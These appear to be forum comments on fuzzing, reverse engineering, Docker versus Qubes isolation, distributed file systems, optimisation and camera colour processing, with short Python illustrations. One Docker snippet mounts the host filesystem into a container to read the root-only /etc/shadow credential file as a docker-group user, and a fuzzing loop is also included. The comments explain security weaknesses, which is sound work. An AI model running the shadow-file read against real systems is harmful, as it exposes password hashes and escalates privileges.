Um, are you sure we are there yet? To me it seems that the only atoms it has learned are long-lasting static scenes, rather than eyes or mouths. Maybe it is just a matter of scoring and can be improved, but still...
Binaries can be converted back to assembly and quite often even back to equivalent C; bugs are most often found by fuzzing (intentional or not), which does not require source code. The difference between open and closed source is that open source is more often analysed by white hats, who tend to publish vulnerabilities and help fix them, while closed source is more often analysed by black hats, who tend to sell or exploit them in secret.
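To make the fuzzing point concrete, here is a minimal black-box fuzzing sketch (the ./target binary and the crash-file naming are made up for illustration) -- note it never touches source code, only a runnable binary:

    # Minimal black-box fuzzing sketch: no source code needed, only a
    # runnable binary. Assumes a hypothetical target at ./target that
    # reads stdin.
    import random
    import subprocess

    def random_input(max_len=1024):
        n = random.randrange(1, max_len)
        return bytes(random.randrange(256) for _ in range(n))

    for i in range(10000):
        data = random_input()
        proc = subprocess.run(["./target"], input=data,
                              stdout=subprocess.DEVNULL,
                              stderr=subprocess.DEVNULL)
        # A negative return code means the process died on a signal,
        # e.g. -11 = SIGSEGV.
        if proc.returncode < 0:
            with open(f"crash_{i}.bin", "wb") as f:
                f.write(data)
            print(f"input {i} crashed the target with signal {-proc.returncode}")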
You misunderstand; if you can't even decrypt the binary, you can't disassemble it, much less run a decompiler over it.
As someone who has done quite a bit of reverse engineering work, I have no idea how I'd identify and isolate a vulnerability found by fuzzing without the ability to even look at the machine code.
If it runs, it has to be decrypted (at the current level of cryptography); at most it is obfuscated and access is blocked by hardware tricks which may be costly to circumvent, but there is nothing fundamental stopping you.
C is not the problem -- you can write a bug in any language. Even with memory safety and a perfect compiler, a bug may direct control flow in the wrong direction (bypassing auth, for instance) or leak information via a side channel.
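A toy sketch of what I mean, in a fully memory-safe language (all names invented for illustration) -- the bug is pure logic, no memory corruption anywhere:

    # A logic bug in a memory-safe language that bypasses auth.
    ADMINS = {"alice"}

    def is_authorised(user, role):
        # Intended: admins, or users acting as "auditor", may read logs.
        # The bug: any non-empty role string is truthy, so "or role"
        # lets everyone in. It should have been:
        #   user in ADMINS or role == "auditor"
        return user in ADMINS or role

    print(is_authorised("mallory", "guest"))  # True -- auth bypassed
    print(is_authorised("mallory", ""))       # False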
This only holds for certain verbal questions like "antonym of", "synonym of", "X is to Y as Z is to what"; for each of them a separate, specific model was built (it is not that the AI read the question and printed the relevant answer).
To sum up, the paper should be titled "Dictionary is better than MechTurk users on look-in-dictionary tasks."
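For the curious, a sketch of the usual machinery behind those "X is to Y as Z is to what" models: vector arithmetic over word embeddings. The tiny vectors below are made up; real systems use embeddings trained on large corpora (word2vec and friends):

    # "X is to Y as Z is to what" via embedding arithmetic.
    # Toy hand-made vectors; real ones come from training on text.
    import numpy as np

    emb = {
        "king":  np.array([0.9, 0.8, 0.1]),
        "queen": np.array([0.9, 0.1, 0.8]),
        "man":   np.array([0.1, 0.9, 0.1]),
        "woman": np.array([0.1, 0.1, 0.9]),
    }

    def analogy(x, y, z):
        # answer ~= y - x + z, scored by cosine similarity over the
        # vocabulary, excluding the query words themselves
        target = emb[y] - emb[x] + emb[z]
        def cos(a, b):
            return a.dot(b) / (np.linalg.norm(a) * np.linalg.norm(b))
        return max((w for w in emb if w not in (x, y, z)),
                   key=lambda w: cos(emb[w], target))

    print(analogy("man", "king", "woman"))  # -> "queen" with these toys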
There are also distributed file systems (MooseFS, Gluster, Ceph) which can duplicate data across physical locations, protect it with checksums, scrub it in a distributed manner and auto-heal, all of that transparently.
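The scrub/auto-heal idea is simple at its core -- roughly something like this sketch (replica paths hypothetical; real systems work per chunk across hosts and use stored checksums rather than majority voting):

    # Scrub-and-heal sketch: compare checksums across replicas and
    # overwrite a corrupted copy with a healthy one.
    import hashlib
    from collections import Counter

    def scrub(replica_paths):
        blobs = {p: open(p, "rb").read() for p in replica_paths}
        digests = {p: hashlib.sha256(b).hexdigest()
                   for p, b in blobs.items()}
        majority, _ = Counter(digests.values()).most_common(1)[0]
        good = next(p for p, d in digests.items() if d == majority)
        for p, d in digests.items():
            if d != majority:
                print(f"healing {p} from {good}")
                with open(p, "wb") as f:
                    f.write(blobs[good])

    scrub(["/mnt/a/chunk_0001", "/mnt/b/chunk_0001", "/mnt/c/chunk_0001"])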
About as hard as setting up any UNIX daemon on a few computers. Reliability is a complex topic and depends on what you need -- as anecdotal evidence, I have maintained a microscopic (10-20TB / 4-6 desktop hosts) MooseFS deployment for a distributed home-dir use case for over 5 years without any data loss, despite two full computer losses, one disk malfunction and numerous network and power outages (it has never detected a bit-rot event, though). There are many serious success and horror stories one Google query away.
We do know what goes on in them. They are just trying (more or less, but that is only a matter of speed) random solutions until one is good enough, where the human operator decides what "good" means. This is fundamental: when you have a function f you know nothing about, the _only_ thing you can do to optimise it is to sample it randomly, keep the best solution so far and hope it is good enough. Anything smarter would require some knowledge or assumptions, so it cannot be applied.
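The whole loop fits in a few lines -- a sketch with a stand-in f (the optimiser uses nothing about its structure):

    # Black-box optimisation by random search: sample f, keep the best
    # so far, stop when "good enough". f is an arbitrary stand-in.
    import random

    def f(x):
        return -(x - 3.217) ** 2  # unknown to the optimiser; higher is better

    best_x, best_score = None, float("-inf")
    for _ in range(100000):
        x = random.uniform(-100, 100)
        score = f(x)
        if score > best_score:
            best_x, best_score = x, score
        if best_score > -1e-6:  # the operator's notion of "good enough"
            break

    print(best_x, best_score)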
In an even more meta direction, though, the question is whether human intelligence is some mystical emergent magic, or just a try-till-good-enough massive optimisation of physiological needs, plus some bonus for social behaviour sponsored by evolution, plus some random noise, hidden behind a self-illusion of being a real thing, similar to consciousness. This idea is obviously somewhat disturbing; it implies that success is only a matter of luck, resourcefulness depends on the environment, motives are never really noble, apes are less successful than us only because they can't (yet?) efficiently store and share information, and art is a matter of an accidental conflux of random biases. On the other hand, it suggests that the singularity is nonsense -- even more, that AGIs will become self-crippled with flaws similar to those we observe in ourselves.
Why, a docker-initiated chroot would prevent FF from accessing any files beyond FF and its libs, including the ones this malware steals; on Qubes it would have access to everything user-readable in the AppVM, which may include some secrets, as the Qubes workflow involves user-supervised copying of files across VMs.
Obviously docker, as opposed to Qubes, won't stop more complex malware that exploits the kernel.
From all I have heard, docker is not even secure enough to let user A do things in dockerthingyA and user B in dockerthingyB. From what I was told, user A could easily break out into dockerthingyB and maybe even into the host. Are you sure it really is not possible short of exploiting the kernel (or docker, I guess)?
I don't know the details, but this is rather due to the way docker operates -- there is a daemon that runs with root privs (which are essential to create a container), controlled by a client over a protocol that has no concept of fine-grained access lists. Consequently, user A can do anything with user B's containers because docker doesn't even have such a thing as container ownership. Also, the docker protocol involves something which is basically opening a shell as root, so users with docker access effectively have passwordless sudo. All those choices are basically OK for docker because it is designed for single-user systems like developer laptops or application servers.
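A concrete illustration of the "passwordless sudo" point, assuming the Python docker SDK and a local daemon (the same works with the plain CLI): any user who can talk to the daemon can mount the host's root filesystem into a container and read files only root should see.

    # Any user in the docker group can read root-only host files by
    # bind-mounting / into a container. Assumes the `docker` SDK.
    import docker

    client = docker.from_env()
    shadow = client.containers.run(
        "alpine",
        "cat /host/etc/shadow",  # root-only file on the host
        volumes={"/": {"bind": "/host", "mode": "ro"}},
        remove=True,
    )
    print(shadow.decode())  # printed by an otherwise unprivileged user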
Currently, for multi-user systems the only safe option for containers is sadly virtualisation or emulation; a nice implementation of rootless chroot is proot: http://proot.me/
Honestly speaking, the "colour" cameras we use every day are also false colour; they shoot 3 monochrome images in red, green and blue chunks of the spectrum and mix the whole thing using a plethora of parameters like white balance or gamma.
All of this is heavily tuned to the specifics of human vision, to enable a monitor or print to induce in the viewer's brain a sensation similar to what the photographed object would, despite the fact that the whole process retains only a negligible fraction of the information carried into the camera by the original photons. Quite a lot of animals would perceive the hue of human-made photos and videos as totally odd, misexposed or desaturated, simply because their vision is adapted to wavelengths or other properties of light which our processing mostly removes as redundant. Even more, one day humans may start to enhance their vision with technological or biological modifications, and consequently begin to perceive today's photos as dull as we see the old monochrome ones.
To elaborate a bit, almost all digital cameras take a single monochrome exposure but each sensor element has either a red, green, or blue filter over it, in a mosaic pattern. From the relative brightnesses of neighboring pixels color data can be reconstructed and interpolated to form a human-viewable image.
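A sketch of that reconstruction step (demosaicing) for an RGGB mosaic, using a crude neighbour average; real camera pipelines use far more sophisticated interpolation, plus white balance, gamma and the rest:

    # Demosaic an RGGB Bayer mosaic: each sensor element recorded only
    # one of R, G, B; estimate the missing channels from neighbours.
    import numpy as np

    def demosaic_rggb(raw):
        h, w = raw.shape
        rgb = np.zeros((h, w, 3))
        mask = np.zeros((h, w, 3))
        mask[0::2, 0::2, 0] = 1  # R at even rows, even cols
        mask[0::2, 1::2, 1] = 1  # G
        mask[1::2, 0::2, 1] = 1  # G
        mask[1::2, 1::2, 2] = 1  # B at odd rows, odd cols
        for c in range(3):
            known = raw * mask[:, :, c]
            # average the known samples in each 3x3 neighbourhood
            value_sum = np.zeros((h, w))
            count = np.zeros((h, w))
            padded_v = np.pad(known, 1)
            padded_m = np.pad(mask[:, :, c], 1)
            for dy in range(3):
                for dx in range(3):
                    value_sum += padded_v[dy:dy + h, dx:dx + w]
                    count += padded_m[dy:dy + h, dx:dx + w]
            rgb[:, :, c] = value_sum / np.maximum(count, 1)
        return rgb

    print(demosaic_rggb(np.random.rand(4, 4)).shape)  # (4, 4, 3)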
The Foveon sensors are a sort-of exception to this rule, but they haven't really demonstrated enough visible benefits for them to become widely adopted.